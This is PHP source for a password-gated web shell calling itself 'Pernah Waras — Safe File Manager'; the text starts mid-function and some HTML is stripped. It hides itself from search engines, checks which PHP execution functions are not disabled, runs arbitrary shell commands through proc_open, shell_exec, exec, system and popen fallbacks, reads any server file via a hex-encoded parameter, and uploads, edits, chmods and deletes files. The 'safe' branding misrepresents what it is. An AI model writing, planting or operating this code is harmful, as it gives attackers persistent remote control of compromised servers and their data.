=')) { $decoded = base64_decode($data, true); if ($decoded !== false) return $decoded; // fallback: try decode then verify $maybe = base64_decode($data); if ($maybe === false) return false; if (base64_encode($maybe) === str_replace(array("\r","\n"),'', $data)) return $maybe; return false; } else { // Very old PHP: best-effort $maybe = base64_decode($data); return $maybe === false ? false : $maybe; } } /* ----------------- CONFIG ----------------- */ // If you want a simple password gate, set $ADMIN $ADMIN_PASSWORD = 'kamunanya'; // set to '' to disable auth /* --------------- ENV / STABILIZER --------------- */ @header_remove(); header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, noimageindex', true); header('Referrer-Policy: no-referrer', true); header('X-Frame-Options: DENY', true); header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0', true); header('Pragma: no-cache', true); header('Expires: 0', true); header('Content-Type: text/html; charset=UTF-8', true); header('X-Content-Type-Options: nosniff', true); header('X-XSS-Protection: 1; mode=block', true); header('Strict-Transport-Security: max-age=63072000; includeSubDomains; preload', true); /* ----------------- SESSION & CSRF ----------------- */ if (session_status() !== PHP_SESSION_ACTIVE) session_start(); if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(16)); } function csrf_input(){ echo ''; } function ensure_csrf(){ if ($_SERVER['REQUEST_METHOD'] === 'POST'){ $tok = isset($_POST['csrf']) ? (string)$_POST['csrf'] : ''; $sess = isset($_SESSION['csrf_token']) ? (string)$_SESSION['csrf_token'] : ''; if (!hash_equals($sess, $tok)) { http_response_code(400); exit('CSRF token invalid'); } } } /* ----------------- AUTH (optional) ----------------- */ function ensure_auth($passwordSetting) { if (!$passwordSetting) return true; // disabled if (!isset($_SESSION['__asli_authed']) || $_SESSION['__asli_authed'] !== true) { // check submitted if (isset($_POST['__asli_login'])) { if (isset($_POST['__asli_password']) && $_POST['__asli_password'] === $passwordSetting) { $_SESSION['__asli_authed'] = true; return true; } $_SESSION['__asli_last_error'] = 'Invalid password'; return false; } return false; } return true; } /* ----------------- UTIL & SAFE HELPERS ----------------- */ function is_fn_usable($fn) { if (!function_exists($fn)) return false; $disabled = (string) @ini_get('disable_functions'); $suhosin = (string) @ini_get('suhosin.executor.func.blacklist'); $blocked = array(); if ($disabled !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $disabled))); if ($suhosin !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $suhosin))); if (!empty($blocked)) { $blocked = array_map('strtolower', array_filter($blocked)); return !in_array(strtolower($fn), $blocked, true); } return true; } function strToHex($s){ $h=''; for($i=0;$i=1024&&$i<4){ $s/=1024; $i++; } return round($s,2).' '.$u[$i]; } function getFileDetails($p){ $f=array(); $d=array(); $i=@scandir($p); if(!is_array($i)) return array(); foreach($i as $it){ if($it=='.'||$it=='..') continue; $fp=rtrim($p,'/').'/'.$it; $det=array('name'=>$it,'type'=>is_dir($fp)?'Folder':'File','size'=>is_dir($fp)?'':formatSize(@filesize($fp)),'permission'=>@substr(sprintf('%o',@fileperms($fp)),-4)); if(is_dir($fp)) $d[]=$det; else $f[]=$det; } return array_merge($d,$f); } function changeDirectory($p){ $p==='..'?@chdir('..'):@chdir($p); } function getCurrentDirectory(){ $rp = realpath(getcwd()); return $rp ? $rp : getcwd(); } function getLink($p,$n){ return is_dir($p) ? ''.htmlspecialchars($n).'' : ''.htmlspecialchars($n).''; } function showBreadcrumb($p){ $p=str_replace('\\','/',$p); $paths=explode('/',$p); echo'
/'; $acc=''; foreach($paths as $pa){ if($pa==='') continue; $acc.='/'.$pa; echo''.htmlspecialchars($pa).'/'; } echo'
'; } /* create file with guaranteed non-zero content */ function create_nonzero_file($path,$userContent=null){ $default="Created by Pernah Waras safe manager @ ".date('c')."\n"; $payload = ($userContent !== null && $userContent !== '') ? $userContent : $default; if (@file_put_contents($path,$payload,LOCK_EX) > 0) return array(true,'file_put_contents'); if ($fp=@fopen($path,'wb')){ $w=@fwrite($fp,$payload); @fclose($fp); if($w>0) return array(true,'fopen+fwrite'); } if ($tmp=@tempnam(sys_get_temp_dir(),'asli_')){ @file_put_contents($tmp,$payload); if(@rename($tmp,$path)||@copy($tmp,$path)){ @unlink($tmp); if(@filesize($path)>0) return array(true,'tempnam+rename/copy'); } @unlink($tmp); } if ($src=@fopen('php://temp','wb+')){ @fwrite($src,$payload); @rewind($src); if($dst=@fopen($path,'wb')){ $copied=@stream_copy_to_stream($src,$dst); @fclose($dst); if($copied>0){ @fclose($src); return array(true,'php://temp copy'); } } @fclose($src); } if (@touch($path) && @file_put_contents($path,$payload,FILE_APPEND) > 0) return array(true,'touch+append'); return array(false,'All methods failed'); } /* ----------------- SAFE SYSTEM WRAPPERS (fx_*) ----------------- */ if (!function_exists('fx_proc_open')) { function fx_proc_open($cmd, $des, &$pipes, $cwd=null, $env=null){ if (!is_fn_usable('proc_open')) return false; return @proc_open($cmd, $des, $pipes, $cwd, $env); } } if (!function_exists('fx_shell_exec')) { function fx_shell_exec($cmd){ if (!is_fn_usable('shell_exec')) return null; return @shell_exec($cmd); } } if (!function_exists('fx_exec')) { function fx_exec($cmd, &$out=null, &$code=null){ if (!is_fn_usable('exec')) { $out = array(); $code = 127; return null; } @exec($cmd, $out, $code); return $out; } } if (!function_exists('fx_system')) { function fx_system($cmd, &$code=null){ if (!is_fn_usable('system')) { $code = 127; return null; } ob_start(); @system($cmd, $code); $o = ob_get_clean(); return $o; } } if (!function_exists('fx_popen')) { function fx_popen($cmd, $mode){ if (!is_fn_usable('popen')) return false; return @popen($cmd, $mode); } } /* unified command runner (tries multiple methods) */ if (!function_exists('run_command_all')) { function run_with_proc_open($cmd,$cwd=null,$timeout=30){ if (!is_fn_usable('proc_open')) return null; $des = array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')); $pipes = array(); $proc = @proc_open($cmd,$des,$pipes,$cwd?:null,null); if (!is_resource($proc)) return null; @stream_set_blocking($pipes[1], false); @stream_set_blocking($pipes[2], false); @fclose($pipes[0]); $buf=''; $start=time(); while(true){ $status = @proc_get_status($proc); $running = $status && !empty($status['running']); $r = array(); if (isset($pipes[1]) && is_resource($pipes[1])) $r[] = $pipes[1]; if (isset($pipes[2]) && is_resource($pipes[2])) $r[] = $pipes[2]; if ($r){ $w = $e = null; @stream_select($r,$w,$e,1); foreach($r as $p){ $chunk = @fread($p,8192); if ($chunk !== false && $chunk !== '') $buf .= $chunk; } } else { usleep(100000); } if (!$running) break; if ($timeout>0 && (time()-$start) >= $timeout){ @proc_terminate($proc, 9); foreach ($pipes as $p) if (is_resource($p)) @fclose($p); @proc_close($proc); return array('method'=>'proc_open','code'=>124,'out'=>$buf."\n[timeout after {$timeout}s]"); } } foreach ($pipes as $p) if (is_resource($p)) @fclose($p); $code = @proc_close($proc); if ($code === -1) $code = null; return array('method'=>'proc_open','code'=>$code,'out'=>$buf); } function run_with_shell_exec($cmd,$cwd=null){ if (!is_fn_usable('shell_exec')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $out = @shell_exec($full); if ($out === null) return null; return array('method'=>'shell_exec','code'=>null,'out'=>$out); } function run_with_exec($cmd,$cwd=null){ if (!is_fn_usable('exec')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $lines = array(); $code = 0; @exec($full,$lines,$code); return array('method'=>'exec','code'=>$code,'out'=>implode("\n",(array)$lines)); } function run_with_system($cmd,$cwd=null){ if (!is_fn_usable('system')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; ob_start(); @system($full,$code); $out = ob_get_clean(); return array('method'=>'system','code'=>$code,'out'=>$out); } function run_with_popen($cmd,$cwd=null){ if (!is_fn_usable('popen')) return null; $full = ($cwd ? "cd ".escapeshellarg($cwd)." && " : '') . $cmd . ' 2>&1'; $h = @popen($full,'r'); if (!is_resource($h)) return null; $buf = ''; while (!feof($h)){ $chunk = @fread($h,8192); if ($chunk===false) break; $buf.=$chunk; } @pclose($h); return array('method'=>'popen','code'=>null,'out'=>$buf); } function run_command_all($cmd,$cwd=null){ $po = run_with_proc_open($cmd,$cwd,30); if ($po) return $po; $order = array('run_with_shell_exec','run_with_exec','run_with_system','run_with_popen'); foreach ($order as $fn){ if (function_exists($fn)) { $res = $fn($cmd,$cwd); if ($res) return $res; } } return array('method'=>'none','code'=>127,'out'=>"Command runner not available on this PHP build."); } } /* ----------------- REQUEST HANDLING ----------------- */ // initial directory $curDir = getCurrentDirectory(); $msg = ''; $cmdOutput = ''; // optional password gate: if configured, require auth before showing UI $auth_ok = ensure_auth($ADMIN_PASSWORD); if ($ADMIN_PASSWORD && !$auth_ok) { $last = isset($_SESSION['__asli_last_error']) ? $_SESSION['__asli_last_error'] : ''; unset($_SESSION['__asli_last_error']); echo ' Pernah Waras Login

Pernah Waras File Manager

'; if ($last) echo '
'.htmlspecialchars($last).'
'; echo '
'; csrf_input(); echo '
Safe File Manager
'; exit; } // GET helpers if (isset($_GET['get_filename'])) { echo basename(hexToStr($_GET['get_filename'])); exit; } if (isset($_GET['ambil-lc-cok'])) { $f = hexToStr($_GET['ambil-lc-cok']); if (file_exists($f)) echo @file_get_contents($f); exit; } if (isset($_GET['dir'])) { changeDirectory(hexToStr($_GET['dir'])); $curDir = getCurrentDirectory(); } // POST actions — protect with CSRF if ($_SERVER['REQUEST_METHOD'] === 'POST') { ensure_csrf(); // validate token // create folder if (isset($_POST['new_folder']) && !empty($_POST['folder_name'])) { $nf = $curDir . '/' . basename($_POST['folder_name']); if (!file_exists($nf)) @mkdir($nf,0755,true); $msg = 'Folder created.'; } // create file if (isset($_POST['new_file']) && !empty($_POST['file_name'])) { $fp = $curDir . '/' . basename($_POST['file_name']); $file_content = isset($_POST['file_content']) ? $_POST['file_content'] : null; list($s,$m) = create_nonzero_file($fp, $file_content); $msg = $s ? "File created using $m." : "Failed to create file."; } // upload if (isset($_POST['upload_file']) && isset($_FILES['uploaded_file'])) { $targetPath = $curDir . '/' . basename($_FILES['uploaded_file']['name']); $tmpFile = $_FILES['uploaded_file']['tmp_name']; if (is_uploaded_file($tmpFile) && @filesize($tmpFile) > 0) { if (@move_uploaded_file($tmpFile, $targetPath)) { $msg = 'File uploaded successfully (move_uploaded_file).'; } else { $content = @file_get_contents($tmpFile); list($success,$method) = create_nonzero_file($targetPath, $content); $msg = $success ? "File uploaded using fallback ($method)." : "Upload failed (fallback failed)."; } } else { list($success,$method) = create_nonzero_file($targetPath, "Upload placeholder @ ".date('c')); $msg = $success ? "Empty upload handled, file created using $method." : "Upload failed (empty file)."; } } // edit/save if (isset($_POST['edit_file'])) { $f = hexToStr($_POST['edit_file']); if (file_exists($f) && is_writable($f)) { $c = isset($_POST['content']) ? $_POST['content'] : ''; if (isset($_POST['mode']) && $_POST['mode'] === 'b64') { // only accept strict base64 (PHP 5.2.0+ with second arg) $dec = safe_base64_decode($c); if ($dec === false) { $msg = 'Save failed: invalid Base64 data'; } else { list($success,$method) = create_nonzero_file($f, $dec); $msg = $success ? "File edited using $method." : "Failed to edit file."; } } else { list($success,$method) = create_nonzero_file($f, $c); $msg = $success ? "File edited using $method." : "Failed to edit file."; } } else { $msg = 'Save failed (file not writable or missing).'; } } // rename if (isset($_POST['rename_path']) && !empty($_POST['new_name'])) { $old = hexToStr($_POST['rename_path']); $new = basename($_POST['new_name']); if ($old && $new && file_exists($old)) @rename($old, dirname($old).'/'.$new); $msg = 'Renamed.'; } // chmod if (isset($_POST['chmod_path']) && !empty($_POST['chmod_value'])) { $path = hexToStr($_POST['chmod_path']); $perm = intval($_POST['chmod_value'],8); if (file_exists($path)) @chmod($path, $perm); $msg = 'Permission changed.'; } // delete if (isset($_POST['delete_path'])) { $f = hexToStr($_POST['delete_path']); if (is_file($f)) @unlink($f); elseif (is_dir($f)) { $fs = @glob($f.'/*'); if (is_array($fs)) { foreach($fs as $fi) is_dir($fi) ? @rmdir($fi) : @unlink($fi); } @rmdir($f); } $msg = 'Deleted.'; } // optional rename/chmod/delete variations in UI may use same fields // other actions fall through } /* ---------- Command handler (separate from file POSTs) ---------- */ if (isset($_POST['cmd']) && !empty(trim((string)$_POST['cmd']))) { // protect with CSRF (already enforced above) $c = trim((string)$_POST['cmd']); // Basic filtering: remove suspicious control characters $c = preg_replace('/[^\x20-\x7E]/', '', $c); try { $result = run_command_all($c, $curDir); $cmdOutput = is_array($result) && isset($result['out']) ? $result['out'] : (string)$result; } catch (Exception $e) { $cmdOutput = 'Error: '.$e->getMessage(); } } /* ----------------- HTML / UI ----------------- */ ?> Pernah Waras — Safe File Manager

Pernah Waras — Safe File Manager

'.htmlspecialchars($msg).''; ?>
NameTypeSizePermissionActions
Edit | Rename | Chmod | Delete

About Me

Contact Me on Telegram